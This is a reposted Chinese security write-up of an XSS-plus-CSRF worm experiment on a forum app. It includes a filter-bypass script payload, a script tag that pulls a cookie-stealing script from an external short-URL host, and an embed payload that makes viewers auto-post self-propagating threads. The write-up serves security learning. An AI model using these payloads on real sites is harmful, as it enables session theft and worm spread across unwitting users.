技术讨论 | 记一次XSS蠕虫渗透实验

栏目: 编程工具 · 发布时间: 5年前

内容简介:*本文原创作者:莫妮卡k37,本文属于FreeBuf原创奖励计划,未经许可禁止转载1.在发帖的内容处发现了存储型XSS2.对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴

*本文原创作者:莫妮卡k37,本文属于FreeBuf原创奖励计划,未经许可禁止转载

大体思路

1.在发帖的内容处发现了存储型XSS

2.对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴

3.所有浏览此页面的用户都会自动发布一个重定向到母感染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次创建一个子贴。

以上就是XSS+CSRF构造蠕虫大体的思路,下面细化各个步骤的过程,水平不高,适合XSS初学者的进阶。

一、存储型XSS

1.进入发帖处,添加初步测试payload,并查看源码:

技术讨论 | 记一次XSS蠕虫渗透实验

2.观察到可以大小写混淆绕过,于是构造payload(对于屏蔽括号的可以用 ’ 来代替):

<sCrIpt>alert'xss'</sCrIpt>

技术讨论 | 记一次XSS蠕虫渗透实验

3.刷新页面观察效果,成功弹窗:

技术讨论 | 记一次XSS蠕虫渗透实验

4.插入JS脚本,利用XSS平台窃取用户cookie,这是最常用的XSS利用手法。

POC:

<sCRiPt/SrC=//60.wf/m5VP>

SRC引用的是短地址,内容为窃取用户cookie的JS脚本,详细可以使用XSS平台自动生成:

技术讨论 | 记一次XSS蠕虫渗透实验

二、XSS配合CSRF的初步测验

1.首先验证是否存在CSRF,同样在发布新贴处,填写标题内容,点击发布抓包:

技术讨论 | 记一次XSS蠕虫渗透实验

2.burp自带的生成CSRF POC,POST包处-》右键-》generate csrf poc -》保存-》使用另一个账号发送POC,查看自己的帖子,发现成功发送新帖。

3.编写JS脚本(可以利用Xss’or来生成)

技术讨论 | 记一次XSS蠕虫渗透实验

4.CSRF+存储型XSS将脚本插入到页面中:

技术讨论 | 记一次XSS蠕虫渗透实验

如图,内容为发布新帖的JS脚本,点击发布,就生成了新帖。

5.浏览此贴,提示成功:

技术讨论 | 记一次XSS蠕虫渗透实验

6.可以看到成功发布出去:

技术讨论 | 记一次XSS蠕虫渗透实验

7.使用其他用户浏览帖子测试—-发现同样不知觉的发了个新帖,至此,XSS+CSRF的攻击已经完成:

技术讨论 | 记一次XSS蠕虫渗透实验

三、蠕虫的构造

再整理一下思路。

蠕虫的前提是子贴的内容,即点击我们母感染贴的用户所发布的子贴的内容是可控的:

1.攻击者创建一个攻击帖(母帖),贴中JS脚本包含:
​
  ①创建一个子回传帖
​
  ②子回传帖的内容是重定向到母帖
​
2.用户浏览母帖,然后自动创建一个子回传帖;

3.子回传帖403重定向到母帖;
​
4.根据内容又创建一个子回传帖;
​
5.用户之间互相浏览,发散,传播,不拉不拉不拉,造成蠕虫攻击。

1.任意发表新帖:

技术讨论 | 记一次XSS蠕虫渗透实验

2.记录帖子的URL并点击编辑:

技术讨论 | 记一次XSS蠕虫渗透实验

3.插入JS脚本,其中控制子回传贴302重定向到母贴的URL。

payload:

<embed/src=/bang.duia.com/web/normal/topic/806440>

意为在页面中插入一个新页面,这个新页面为母贴。

技术讨论 | 记一次XSS蠕虫渗透实验

4.发布后浏览,已生成子回传贴:

技术讨论 | 记一次XSS蠕虫渗透实验

5.打开子回传贴,发现了在母贴JS脚本中构造的框架:

技术讨论 | 记一次XSS蠕虫渗透实验

6.但是在FireFox却很遗憾没有成功,打开Network发现了这样一个提示。意为无效的CORS(跨域资源共享)请求。猜测此处应该是属于白名单拦截,限制了JS的入口:

技术讨论 | 记一次XSS蠕虫渗透实验

7.通过IE可以运行:

技术讨论 | 记一次XSS蠕虫渗透实验 技术讨论 | 记一次XSS蠕虫渗透实验

8.重点!!这些都不是最重要的,因为这是一个APP,所以用户基本上是依赖手机端来运行。之后在手机端上查看帖子成功通过子回传URL重定向到母贴并创建了一个新的子回传贴。虽然网站可能有WAF,电脑端IE可以蠕起来,但是发现,app端没有做任何防护,直接可以传播。

技术讨论 | 记一次XSS蠕虫渗透实验 技术讨论 | 记一次XSS蠕虫渗透实验 *本文原创作者:莫妮卡k37,本文属于FreeBuf原创奖励计划,未经许可禁止转载


以上所述就是小编给大家介绍的《技术讨论 | 记一次XSS蠕虫渗透实验》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

硅谷钢铁侠

硅谷钢铁侠

[美] 阿什利·万斯 / 周恒星 / 中信出版集团 / 2016-4 / 68.00元

◎全球首部埃隆•马斯克授权著作!了解埃隆•马斯克最全面、最真实、最经典读本 ◎创业者必读。首次披露马斯克如何建立和运营PayPal、特斯拉、Space X、Solar City等公司的细节。 ◎创新者必读。关于科技、梦想、创业、工作、团队、人生。马斯克首次公开创新的秘密。 ◎故事迷必读。硅谷最优秀科技作家阿什利•万斯历时将近4年,遍访300余人,写就记录马斯克传奇人生的经典著作。......一起来看看 《硅谷钢铁侠》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具